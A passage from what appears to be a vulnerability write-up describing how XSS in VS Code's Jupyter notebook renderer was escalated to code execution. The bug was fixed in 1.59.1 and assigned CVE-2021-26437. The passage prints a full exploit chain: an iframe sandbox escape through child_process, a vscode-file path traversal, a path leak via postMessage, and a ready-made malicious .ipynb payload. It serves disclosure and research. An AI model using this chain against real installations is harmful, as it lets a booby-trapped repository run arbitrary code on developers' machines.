This BrowserWindow loads content using the vscode-file protocol, which is similar to the file protocol. Unfortunately, our injection occurs in a nested sandboxed iframe as shown in the following diagram:

VScode BrowserWindow Design

In particular, our sandbox iframe is created using the following attributes:

allow-scripts allow-same-origin allow-forms allow-pointer-lock allow-downloads

By default, sandbox makes the browser treat the iframe as if it were coming from another origin, even if its src points to the same site. Thanks to the allow-same-origin attribute, this limitation is lifted. As long as the content loaded within the webview is also hosted on the local filesystem (within the app folder), we can access the top window. With that, we can simply execute code using something like top.require('child_process').exec('open /System/Applications/Calculator.app');
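
For illustration, a minimal page exercising this escape might look like the following. This is a hypothetical sketch of what the final poc.html could contain; the file name and the Calculator payload simply mirror the examples used throughout this post:

<!-- poc.html: once served from a vscode-file:// URL, the top window is reachable -->
<script>
  // Reach into the main BrowserWindow (where nodeIntegration is enabled)
  // and spawn an arbitrary process via Node's child_process module
  top.require('child_process').exec('open /System/Applications/Calculator.app');
</script>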

So, how do we place our arbitrary HTML/JS content within the application install folder?

Alternatively, can we reference resources outside that folder?

The answer comes from a recent presentation I watched at the latest Black Hat USA 2022 briefings. In exploiting CVE-2021-43908, TheGrandPew and s1r1us use a path traversal to load arbitrary files outside of the VSCode installation path.

vscode-file://vscode-app/Applications/Visual Studio Code.app/Contents/Resources/app/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/somefile.html

Similarly to their exploit, we can attempt to leverage a postMessage reply to leak the path of the current user directory. In fact, our payload can be placed inside the malicious repository, together with the Jupyter Notebook file that triggers the XSS.

After a couple of hours of trial and error, I discovered that we can obtain a reference to the img tag triggering the XSS by forcing execution during the onload event.

Path Leak VScode

With that, all of the ingredients are ready and I can finally assemble the final exploit:

// Location of the VSCode app bundle, URL-encoded for use in vscode-file:// URLs
var apploc = '/Applications/Visual Studio Code.app/Contents/Resources/app/'.replace(/ /g, '%20');
var repoloc;
// Listen for the webview's reply: its contents include a <base href> tag that leaks the repository path
window.top.frames[0].onmessage = event => {
    if(event.data.args.contents && event.data.args.contents.includes('<base href')){
        var leakloc = event.data.args.contents.match('<base href=\"(.*)\"')[1];
        // Rewrite the leaked vscode-resource URL into a vscode-file:// path traversal
        repoloc = leakloc.replace('https://file%2B.vscode-resource.vscode-webview.net','vscode-file://vscode-app'+apploc+'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..');
        setTimeout(async()=>console.log(repoloc+'poc.html'), 3000);
        // Navigate the iframe to the attacker-controlled poc.html inside the cloned repository
        location.href=repoloc+'poc.html';
    }
};
// Ask the webview to reload, which triggers the postMessage reply containing <base href>
window.top.postMessage({target: window.location.href.split('/')[2],channel: 'do-reload'}, '*');

To deliver this payload inside the .ipynb file, we still need to overcome one last limitation: the current implementation results in malformed JSON. The injection happens within a JSON file (double-quoted), while our JavaScript payload contains single-quoted strings as well as double quotes used as delimiters in the regular expression that extracts the path.

After a bit of tinkering, the easiest solution is to use the backtick (`) character instead of quotes for all JS strings.

The final pocimg.ipynb file looks like:

{
  "cells": [
    {
      "cell_type": "code",
      "execution_count": null,
      "source": [],
      "outputs": [
        {
          "output_type": "display_data",
          "data": {"text/markdown": "<img src='a445fff1d9fd4f3fb97b75202282c992.png' onload='var apploc = `/Applications/Visual Studio Code.app/Contents/Resources/app/`.replace(/ /g, `%20`);var repoloc;window.top.frames[0].onmessage = event => {if(event.data.args.contents && event.data.args.contents.includes(`<base href`)){var leakloc = event.data.args.contents.match(`<base href=\"(.*)\"`)[1];var repoloc = leakloc.replace(`https://file%2B.vscode-resource.vscode-webview.net`,`vscode-file://vscode-app`+apploc+`..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..`);setTimeout(async()=>console.log(repoloc+`poc.html`), 3000);location.href=repoloc+`poc.html`;}};window.top.postMessage({target: window.location.href.split(`/`)[2],channel: `do-reload`}, `*`);'>"}
        }
      ]
    }
  ]
}

By opening a malicious repository with this file, we can finally trigger our code execution.


The built-in Jupyter Notebook extension opts out of the protections given by the Workspace Trust feature introduced in Visual Studio Code 1.57, hence no further user interaction is required. For the record, this issue was fixed in VScode 1.59.1 and Microsoft assigned CVE-2021-26437 to it.
